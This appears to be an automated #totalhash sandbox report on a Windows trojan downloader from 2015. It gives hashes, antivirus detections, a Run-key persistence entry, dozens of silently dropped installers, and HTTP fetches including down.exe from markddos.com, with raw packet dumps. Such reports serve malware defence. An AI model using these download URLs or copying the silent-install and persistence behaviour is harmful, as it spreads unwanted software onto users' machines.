Analysis | #totalhash

Analysis Date	2015-04-09 12:30:14
MD5	188a26a038431c5c5d12690e89112639
SHA1	d4c3b0d14be879e6ec89c142d058ca3f84e152e7

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: c1e0625655fec2c794ad156122efaeb6 sha1: 3678539b205969495151a40085f98e5b9ba40dca size: 425984
Section	.rdata md5: 84757542d53dd972b169ed4a1c726f59 sha1: 1b354d4274dfcc9fd968c2eb56f991f68c2efef0 size: 73728
Section	.data md5: 44df68437fe47b536e9db4c156451107 sha1: ec39b3b9f403b81ef643a0147ded306fb9e1ec2e size: 61440
Section	.rsrc md5: b8c2a05a605bdf24eba896ec92c05919 sha1: 54cdb202d623745cac24a169f60bf93a4caf16f1 size: 24576
Timestamp	2015-04-01 04:05:02
Version	LegalCopyright: 作者版权所有请尊重并使用正版 FileVersion: 1.0.0.0 Comments: 本程序使用易语言编写(http://www.eyuyan.com) ProductName: 易语言程序 ProductVersion: 1.0.0.0 FileDescription: 易语言程序
Packer	Microsoft Visual C++ v6.0
PEhash	92364683295be49d51ca27559afa0b36155e08cf
IMPhash	95399cf8f12a4df9c830293f94dcef7f
AV	360 Safe	no_virus
AV	Ad-Aware	Gen:Variant.Graftor.98607
AV	Alwil (avast)	Evo-gen [Susp]
AV	Arcabit (arcavir)	Gen:Variant.Graftor.98607
AV	Authentium	W32/Agent.EW.gen!Eldorado
AV	Avira (antivir)	TR/Agent.589824.519
AV	BullGuard	Gen:Variant.Graftor.98607
AV	CA (E-Trust Ino)	no_virus
AV	CAT (quickheal)	no_virus
AV	ClamAV	no_virus
AV	Dr. Web	Trojan.DownLoader12.54665
AV	Emsisoft	Gen:Variant.Graftor.98607
AV	Eset (nod32)	no_virus
AV	Fortinet	W32/Generic!tr
AV	Frisk (f-prot)	W32/Agent.EW.gen!Eldorado
AV	F-Secure	Trojan:W32/DelfInject.R
AV	Grisoft (avg)	Win32/DH{IEEPIiVXZ04}
AV	Ikarus	no_virus
AV	K7	no_virus
AV	Kaspersky 2015	Trojan.Win32.Generic
AV	MalwareBytes	Spyware.OnlineGames
AV	Mcafee	Pasta
AV	Microsoft Security Essentials	no_virus
AV	MicroWorld (escan)	Gen:Variant.Graftor.98607
AV	Rising	no_virus
AV	Sophos	no_virus
AV	Symantec	no_virus
AV	Trend Micro	no_virus
AV	VirusBlokAda (vba32)	no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry	HKEY_LOCAL_MACHINE\software\microsoft\windows\CurrentVersion\Run\sbds ➝ malware.exe\C:\\x00
Creates File	C:\Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe
Creates File	C:\7654\\xc2\\xbe\\xc2\\xb2\\xc3\\x84\\xc2\\xac\\xc2\\xb0\\xc3\\xbc.exe
Creates File	C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File	C:\Windows\boos.exe
Creates File	C:\haozip_silent_782130248.exe
Creates File	C:\pic_silent_782130248.exe
Creates File	C:\WINDOWS\system32\2345haozip_k87648162.exe
Creates File	C:\kuwo_silent_782130248.exe
Creates File	C:\bdpinyin_silent_782130248.exe
Creates File	C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File	C:\bdBrowserSetup-5956-ftn_1000151945.exe
Creates File	C:\BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe
Creates File	C:\pps_silent_782130248.exe
Creates File	C:\qqpcmgr_silent_782130248.exe
Creates File	C:\PPTV_forqd3036_02134.exe
Creates File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File	C:\2345explorer_k87648162.exe
Creates File	C:\BaiduAn.Setup.1117.4.0.0.516_1000151945.exe
Creates File	C:\2345pcsafe_k87648162.exe
Creates File	C:\dscKAVSETUPS_66_130903.exe
Creates File	C:\lkfish_k87648162_332947.exe
Creates File	C:\bdsBaofeng5%5B%5B1671_02134%5D%5D.exe
Creates Process	C:\bdpinyin_silent_782130248.exe
Creates Process	C:\2345pcsafe_k87648162.exe
Creates Process	C:\pps_silent_782130248.exe
Creates Process	C:\pic_silent_782130248.exe
Creates Process	C:\2345haozip_k87648162.exe
Creates Process	C:\Windows\boos.exe
Creates Process	C:\kuwo_silent_782130248.exe
Creates Process	C:\qqpcmgr_silent_782130248.exe
Creates Process	C:\bdBrowserSetup-5956-ftn_1000151945.exe
Creates Process	C:\lkfish_k87648162_332947.exe
Creates Process	C:\7654\\xc2\\xbe\\xc2\\xb2\\xc3\\x84\\xc2\\xac\\xc2\\xb0\\xc3\\xbc.exe
Creates Process	C:\haozip_silent_782130248.exe
Creates Process	C:\BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe
Creates Process	C:\Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe
Creates Process	C:\bdsBaofeng5%5B%5B1671_02134%5D%5D.exe
Creates Process	C:\PPTV_forqd3036_02134.exe
Creates Process	C:\BaiduAn.Setup.1117.4.0.0.516_1000151945.exe
Creates Process	C:\dscKAVSETUPS_66_130903.exe
Creates Mutex	c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex	WininetConnectionMutex
Creates Mutex	c:!documents and settings!administrator!cookies!
Creates Mutex	c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\2345haozip_k87648162.exe

Process
↳ C:\2345pcsafe_k87648162.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\TEMP\scs2.tmp
Creates File	C:\2345PC~1.EXE
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\TEMP\scs1.tmp
Deletes File	C:\WINDOWS\TEMP\scs1.tmp
Deletes File	C:\WINDOWS\TEMP\scs2.tmp

Process
↳ C:\lkfish_k87648162_332947.exe

Creates File	C:\LKFISH~1.EXE
Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\TEMP\scs4.tmp
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\TEMP\scs3.tmp
Deletes File	C:\WINDOWS\TEMP\scs4.tmp
Deletes File	C:\WINDOWS\TEMP\scs3.tmp

Process
↳ C:\dscKAVSETUPS_66_130903.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\TEMP\scs5.tmp
Creates File	C:\DSCKAV~1.EXE
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\TEMP\scs6.tmp
Deletes File	C:\WINDOWS\TEMP\scs5.tmp
Deletes File	C:\WINDOWS\TEMP\scs6.tmp

Process
↳ C:\BaiduAn.Setup.1117.4.0.0.516_1000151945.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\TEMP\scs7.tmp
Creates File	C:\WINDOWS\TEMP\scs8.tmp
Creates File	C:\BAIDUA~1.EXE
Deletes File	C:\WINDOWS\TEMP\scs8.tmp
Deletes File	C:\WINDOWS\TEMP\scs7.tmp

Process
↳ C:\Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\BAIDUS~1.EXE
Creates File	C:\WINDOWS\TEMP\scsA.tmp
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\TEMP\scs9.tmp
Deletes File	C:\WINDOWS\TEMP\scsA.tmp
Deletes File	C:\WINDOWS\TEMP\scs9.tmp

Process
↳ C:\bdBrowserSetup-5956-ftn_1000151945.exe

Creates File	C:\BDBROW~1.EXE
Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\TEMP\scsC.tmp
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\TEMP\scsB.tmp
Deletes File	C:\WINDOWS\TEMP\scsC.tmp
Deletes File	C:\WINDOWS\TEMP\scsB.tmp

Process
↳ C:\BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\BAIDUP~1.EXE
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\TEMP\scsD.tmp
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\TEMP\scsE.tmp
Deletes File	C:\WINDOWS\TEMP\scsD.tmp
Deletes File	C:\WINDOWS\TEMP\scsE.tmp

Process
↳ C:\qqpcmgr_silent_782130248.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\TEMP\scsF.tmp
Creates File	C:\QQPCMG~1.EXE
Creates File	C:\WINDOWS\TEMP\scs10.tmp
Deletes File	C:\WINDOWS\TEMP\scsF.tmp
Deletes File	C:\WINDOWS\TEMP\scs10.tmp

Process
↳ C:\bdpinyin_silent_782130248.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\BDPINY~1.EXE
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\TEMP\scs12.tmp
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\TEMP\scs11.tmp
Deletes File	C:\WINDOWS\TEMP\scs12.tmp
Deletes File	C:\WINDOWS\TEMP\scs11.tmp

Process
↳ C:\pps_silent_782130248.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\PPS_SI~1.EXE
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\TEMP\scs14.tmp
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\TEMP\scs13.tmp
Deletes File	C:\WINDOWS\TEMP\scs13.tmp
Deletes File	C:\WINDOWS\TEMP\scs14.tmp

Process
↳ C:\haozip_silent_782130248.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\TEMP\scs16.tmp
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\HAOZIP~1.EXE
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\TEMP\scs15.tmp
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Deletes File	C:\WINDOWS\TEMP\scs16.tmp
Deletes File	C:\WINDOWS\TEMP\scs15.tmp

Process
↳ C:\pic_silent_782130248.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\TEMP\scs17.tmp
Creates File	C:\WINDOWS\TEMP\scs18.tmp
Creates File	C:\PIC_SI~1.EXE
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes File	C:\WINDOWS\TEMP\scs17.tmp
Deletes File	C:\WINDOWS\TEMP\scs18.tmp

Process
↳ C:\kuwo_silent_782130248.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\TEMP\scs1A.tmp
Creates File	C:\KUWO_S~1.EXE
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\TEMP\scs19.tmp
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes File	C:\WINDOWS\TEMP\scs1A.tmp
Deletes File	C:\WINDOWS\TEMP\scs19.tmp

Process
↳ C:\PPTV_forqd3036_02134.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\TEMP\scs1C.tmp
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\PPTV_F~1.EXE
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\TEMP\scs1B.tmp
Deletes File	C:\WINDOWS\TEMP\scs1C.tmp
Deletes File	C:\WINDOWS\TEMP\scs1B.tmp

Process
↳ C:\bdsBaofeng5%5B%5B1671_02134%5D%5D.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\WINDOWS\TEMP\scs1D.tmp
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File	C:\WINDOWS\TEMP\scs1E.tmp
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\BDSBAO~1.EXE
Deletes File	C:\WINDOWS\TEMP\scs1D.tmp
Deletes File	C:\WINDOWS\TEMP\scs1E.tmp

Process
↳ C:\7654\\xc2\\xbe\\xc2\\xb2\\xc3\\x84\\xc2\\xac\\xc2\\xb0\\xc3\\xbc.exe

Creates File	C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File	C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File	C:\WINDOWS\TEMP\scs1F.tmp
Creates File	C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File	C:\7654~1.EXE
Creates File	C:\WINDOWS\TEMP\scs20.tmp
Creates File	C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File	C:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes File	C:\WINDOWS\TEMP\scs1F.tmp
Deletes File	C:\WINDOWS\TEMP\scs20.tmp

Process
↳ C:\Windows\boos.exe

Network Details:

DNS	download.2345.com Type: A 61.160.245.14
DNS	download.2345.com Type: A 122.228.248.3
DNS	download.2345.com Type: A 218.75.155.244
DNS	download.2345.com Type: A 60.191.187.15
DNS	download.2345.com Type: A 60.191.223.2
DNS	download.2345.com Type: A 60.191.223.4
DNS	download.2345.com Type: A 60.191.223.15
DNS	download.2345.com Type: A 61.147.127.202
DNS	download.2345.com Type: A 61.147.127.203
DNS	download.2345.com Type: A 61.160.245.8
DNS	download.2345.com Type: A 61.160.245.11
DNS	tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.11
DNS	tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.13
DNS	tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.14
DNS	tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.9
DNS	tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.10
DNS	tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.11
DNS	tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.12
DNS	tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.9
DNS	brdlsw.jomodns.com Type: A 124.238.238.46
DNS	download.58611.net Type: A 218.241.29.215
DNS	cache.bfcdn.net Type: A 122.72.76.199
DNS	pcsnb2.jomodns.com Type: A 115.231.42.46
DNS	www.markddos.com Type: A 198.211.24.230
DNS	jifendownload.2345.cn Type: A
DNS	d.union.ijinshan.com Type: A
DNS	dlsw.br.baidu.com Type: A
DNS	u.dl.baofeng.com Type: A
DNS	nb.cache.baidupcs.com Type: A
HTTP GET	http://jifendownload.2345.cn/jifen_2345/2345explorer_k87648162.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://jifendownload.2345.cn/jifen_2345/2345pcsafe_k87648162.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://jifendownload.2345.cn/jifen_2345/lkfish_k87648162_332947.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://jifendownload.2345.cn/jifen_2345/2345haozip_k87648162.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://d.union.ijinshan.com/duba/link/dscKAVSETUPS_66_130903.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://dlsw.br.baidu.com/ditui/zujian/BaiduAn.Setup.1117.4.0.0.516_1000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://dlsw.br.baidu.com/ditui/zujian/Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://dlsw.br.baidu.com/ditui/zujian/bdBrowserSetup-5956-ftn_1000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://dlsw.br.baidu.com/ditui/zujian/BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://download.58611.net:8181/qqPCTray_silent/qqpcmgr_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://download.58611.net:8181/pinyin/bdpinyin_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://download.58611.net:8181/pps/pps_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://download.58611.net:8181/haozip_silent/haozip_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://download.58611.net:8181/pic/pic_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://download.58611.net:8181/kuwo_silent/kuwo_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://download.58611.net:8181/pptv_silent/PPTV_forqd3036_02134.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://u.dl.baofeng.com/upload/bdsBaofeng5%5B%5B1671_02134%5D%5D.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://nb.cache.baidupcs.com/file/e15788e5a4a5bc4ccbd8acfccccddd3b?bkt=p2-qd-294&xcode=57d758161f66de706ccd294c1df1f083ad23dfac9bf6b2990b2977702d3e6764&fid=1801360174-250528-100554078920541&time=1427860893&sign=FDTAXERLBH-DCb740ccc5511e5e8fedcff06b081203-FFbapq2m6pKvQgf68PPDkIbWRiQ%3D&to=nbc&fm=Nan,B,M,ny&sta_dx=2&sta_cs=1&sta_ft=exe&sta_ct=0&newver=1&newfm=1&flow_ver=3&sl=80347212&expires=8h&rt=sh&r=417997622&mlogid=3844192640&vuk=137491712&vbdid=3540108374&fin=7654%E9%9D%99%E9%BB%98%E5%8C%85.exe&fn=7654%E9%9D%99%E9%BB%98%E5%8C%85.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET	http://www.markddos.com:8555/down.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP	192.168.1.1:1031 ➝ 61.160.245.14:80
Flows TCP	192.168.1.1:1032 ➝ 61.160.245.14:80
Flows TCP	192.168.1.1:1033 ➝ 61.160.245.14:80
Flows TCP	192.168.1.1:1034 ➝ 61.160.245.14:80
Flows TCP	192.168.1.1:1035 ➝ 8.37.235.11:80
Flows TCP	192.168.1.1:1036 ➝ 124.238.238.46:80
Flows TCP	192.168.1.1:1037 ➝ 124.238.238.46:80
Flows TCP	192.168.1.1:1038 ➝ 124.238.238.46:80
Flows TCP	192.168.1.1:1039 ➝ 124.238.238.46:80
Flows TCP	192.168.1.1:1040 ➝ 218.241.29.215:8181
Flows TCP	192.168.1.1:1041 ➝ 218.241.29.215:8181
Flows TCP	192.168.1.1:1042 ➝ 218.241.29.215:8181
Flows TCP	192.168.1.1:1043 ➝ 218.241.29.215:8181
Flows TCP	192.168.1.1:1044 ➝ 218.241.29.215:8181
Flows TCP	192.168.1.1:1045 ➝ 218.241.29.215:8181
Flows TCP	192.168.1.1:1046 ➝ 218.241.29.215:8181
Flows TCP	192.168.1.1:1047 ➝ 122.72.76.199:80
Flows TCP	192.168.1.1:1048 ➝ 115.231.42.46:80
Flows TCP	192.168.1.1:1049 ➝ 198.211.24.230:8555

Raw Pcap

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   32333435 6578706c 6f726572 5f6b3837   2345explorer_k87
0x00000020 (00032)   36343831 36322e65 78652048 5454502f   648162.exe HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000050 (00080)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000060 (00096)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000070 (00112)   2e30290d 0a416363 6570743a 202a2f2a   .0)..Accept: */*
0x00000080 (00128)   0d0a486f 73743a20 6a696665 6e646f77   ..Host: jifendow
0x00000090 (00144)   6e6c6f61 642e3233 34352e63 6e0d0a43   nload.2345.cn..C
0x000000a0 (00160)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000b0 (00176)   2d636163 68650d0a 0d0a                -cache....

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   32333435 70637361 66655f6b 38373634   2345pcsafe_k8764
0x00000020 (00032)   38313632 2e657865 20485454 502f312e   8162.exe HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e30   ; Windows NT 5.0
0x00000070 (00112)   290d0a41 63636570 743a202a 2f2a0d0a   )..Accept: */*..
0x00000080 (00128)   486f7374 3a206a69 66656e64 6f776e6c   Host: jifendownl
0x00000090 (00144)   6f61642e 32333435 2e636e0d 0a436163   oad.2345.cn..Cac
0x000000a0 (00160)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000b0 (00176)   61636865 0d0a0d0a 0d0a                ache......

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   6c6b6669 73685f6b 38373634 38313632   lkfish_k87648162
0x00000020 (00032)   5f333332 3934372e 65786520 48545450   _332947.exe HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000050 (00080)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000060 (00096)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000070 (00112)   352e3029 0d0a4163 63657074 3a202a2f   5.0)..Accept: */
0x00000080 (00128)   2a0d0a48 6f73743a 206a6966 656e646f   *..Host: jifendo
0x00000090 (00144)   776e6c6f 61642e32 3334352e 636e0d0a   wnload.2345.cn..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   32333435 68616f7a 69705f6b 38373634   2345haozip_k8764
0x00000020 (00032)   38313632 2e657865 20485454 502f312e   8162.exe HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e30   ; Windows NT 5.0
0x00000070 (00112)   290d0a41 63636570 743a202a 2f2a0d0a   )..Accept: */*..
0x00000080 (00128)   486f7374 3a206a69 66656e64 6f776e6c   Host: jifendownl
0x00000090 (00144)   6f61642e 32333435 2e636e0d 0a436163   oad.2345.cn..Cac
0x000000a0 (00160)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000b0 (00176)   61636865 0d0a0d0a 0a0d0a              ache.......

0x00000000 (00000)   47455420 2f647562 612f6c69 6e6b2f64   GET /duba/link/d
0x00000010 (00016)   73634b41 56534554 5550535f 36365f31   scKAVSETUPS_66_1
0x00000020 (00032)   33303930 332e6578 65204854 54502f31   30903.exe HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000050 (00080)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x00000060 (00096)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x00000070 (00112)   30290d0a 41636365 70743a20 2a2f2a0d   0)..Accept: */*.
0x00000080 (00128)   0a486f73 743a2064 2e756e69 6f6e2e69   .Host: d.union.i
0x00000090 (00144)   6a696e73 68616e2e 636f6d0d 0a436163   jinshan.com..Cac
0x000000a0 (00160)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000b0 (00176)   61636865 0d0a0d0a 0a0d0a              ache.......

0x00000000 (00000)   47455420 2f646974 75692f7a 756a6961   GET /ditui/zujia
0x00000010 (00016)   6e2f4261 69647541 6e2e5365 7475702e   n/BaiduAn.Setup.
0x00000020 (00032)   31313137 2e342e30 2e302e35 31365f31   1117.4.0.0.516_1
0x00000030 (00048)   30303031 35313934 352e6578 65204854   000151945.exe HT
0x00000040 (00064)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 30290d0a 41636365 70743a20   T 5.0)..Accept: 
0x00000090 (00144)   2a2f2a0d 0a486f73 743a2064 6c73772e   */*..Host: dlsw.
0x000000a0 (00160)   62722e62 61696475 2e636f6d 0d0a4361   br.baidu.com..Ca
0x000000b0 (00176)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000c0 (00192)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f646974 75692f7a 756a6961   GET /ditui/zujia
0x00000010 (00016)   6e2f4261 69647573 642e5365 7475702e   n/Baidusd.Setup.
0x00000020 (00032)   332e302e 302e3436 30392e79 6f757169   3.0.0.4609.youqi
0x00000030 (00048)   616e5f31 30303031 35313934 352e6578   an_1000151945.ex
0x00000040 (00064)   65204854 54502f31 2e310d0a 55736572   e HTTP/1.1..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 30290d0a 41636365   ws NT 5.0)..Acce
